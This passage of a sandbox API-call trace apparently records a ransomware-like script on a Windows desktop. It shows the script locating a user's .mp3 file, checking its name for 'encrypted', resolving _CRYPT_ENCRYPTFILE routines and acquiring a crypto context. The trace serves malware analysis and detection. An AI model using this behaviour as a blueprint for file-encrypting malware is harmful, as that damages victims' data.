0x7af5b8 [0030.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0030.122] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0030.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0030.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0030.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0030.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0030.122] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0030.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0030.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0030.122] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0030.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb20 [0030.122] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88cb20, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0030.122] FreeLibrary (hLibModule=0x76e10000) returned 1 [0030.122] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0030.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0030.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0030.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0030.123] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0030.123] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0030.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af438 [0030.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0030.123] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0030.123] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0030.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0030.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0030.123] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0030.123] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0030.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0030.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0030.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0030.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0030.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0030.123] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.123] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.123] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.123] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0030.123] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0030.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0030.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0030.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0030.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0030.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0030.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db300 [0030.123] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0030.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0030.123] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0030.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0030.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0030.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0030.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0030.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0030.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0030.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0030.124] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NXpTuweJZ.mp3", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2450f20, ftCreationTime.dwHighDateTime=0x1d5bbdf, ftLastAccessTime.dwLowDateTime=0x7e0c1db0, ftLastAccessTime.dwHighDateTime=0x1d5c12d, ftLastWriteTime.dwLowDateTime=0x7e0c1db0, ftLastWriteTime.dwHighDateTime=0x1d5c12d, nFileSizeHigh=0x0, nFileSizeLow=0x9dab, dwReserved0=0x0, dwReserved1=0x777648, cFileName="NXpTuweJZ.mp3", cAlternateFileName="NXPTUW~1.MP3")) returned 0x7c20c0 [0030.124] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0030.124] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0030.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14b8 [0030.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0030.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0030.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0030.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0030.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0030.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0030.124] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NXpTuweJZ.mp3", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2450f20, ftCreationTime.dwHighDateTime=0x1d5bbdf, ftLastAccessTime.dwLowDateTime=0x7e0c1db0, ftLastAccessTime.dwHighDateTime=0x1d5c12d, ftLastWriteTime.dwLowDateTime=0x7e0c1db0, ftLastWriteTime.dwHighDateTime=0x1d5c12d, nFileSizeHigh=0x0, nFileSizeLow=0x9dab, dwReserved0=0x0, dwReserved1=0x777648, cFileName="NXpTuweJZ.mp3", cAlternateFileName="NXPTUW~1.MP3")) returned 0x7c20c0 [0030.124] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0030.124] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0030.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0030.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0030.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0030.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0030.125] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NXpTuweJZ.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.125] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NXpTuweJZ.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.125] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NXpTuweJZ.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.125] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NXpTuweJZ.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.125] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NXpTuweJZ.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.125] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\NXpTuweJZ.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.125] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\NXpTuweJZ.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.125] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\NXpTuweJZ.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.125] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\NXpTuweJZ.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.125] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\NXpTuweJZ.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.125] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\NXpTuweJZ.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.125] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\NXpTuweJZ.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.125] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\NXpTuweJZ.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.125] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\NXpTuweJZ.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.125] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\NXpTuweJZ.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.125] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\NXpTuweJZ.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.125] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\NXpTuweJZ.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.125] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\NXpTuweJZ.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.125] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\NXpTuweJZ.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.125] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\NXpTuweJZ.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.125] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\NXpTuweJZ.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.125] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\NXpTuweJZ.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.125] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\NXpTuweJZ.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.125] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\NXpTuweJZ.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.125] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\NXpTuweJZ.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.125] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\NXpTuweJZ.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.125] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\NXpTuweJZ.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.125] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\NXpTuweJZ.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.125] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\NXpTuweJZ.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.125] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\NXpTuweJZ.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.125] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\NXpTuweJZ.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.125] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\NXpTuweJZ.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.125] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\NXpTuweJZ.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.125] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\NXpTuweJZ.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.126] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\NXpTuweJZ.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.126] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\NXpTuweJZ.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.126] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\NXpTuweJZ.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.126] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\NXpTuweJZ.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.126] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\NXpTuweJZ.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.126] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NXpTuweJZ.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.126] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XpTuweJZ.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.126] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pTuweJZ.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.126] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TuweJZ.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.126] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uweJZ.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.126] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="weJZ.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.126] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0030.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0030.126] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0030.126] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0030.126] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0030.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0030.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0030.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0030.126] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.126] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.126] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.126] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0030.126] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0030.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0030.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0030.126] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0030.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0030.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0030.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0030.127] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0030.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0030.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0030.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0030.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0030.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0030.127] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0030.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0030.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0030.127] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0030.127] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NXpTuweJZ.mp3", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2450f20, ftCreationTime.dwHighDateTime=0x1d5bbdf, ftLastAccessTime.dwLowDateTime=0x7e0c1db0, ftLastAccessTime.dwHighDateTime=0x1d5c12d, ftLastWriteTime.dwLowDateTime=0x7e0c1db0, ftLastWriteTime.dwHighDateTime=0x1d5c12d, nFileSizeHigh=0x0, nFileSizeLow=0x9dab, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="NXpTuweJZ.mp3", cAlternateFileName="NXPTUW~1.MP3")) returned 0x7c2240 [0030.127] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0030.127] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.127] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0030.127] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.127] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0030.127] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0030.127] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.127] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0030.128] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.128] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.128] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0030.128] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0030.128] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0030.128] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.128] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.128] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.128] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0030.128] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.128] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5b30) returned 1 [0030.129] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.129] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.129] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0030.129] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0030.129] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0030.129] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.129] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.129] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 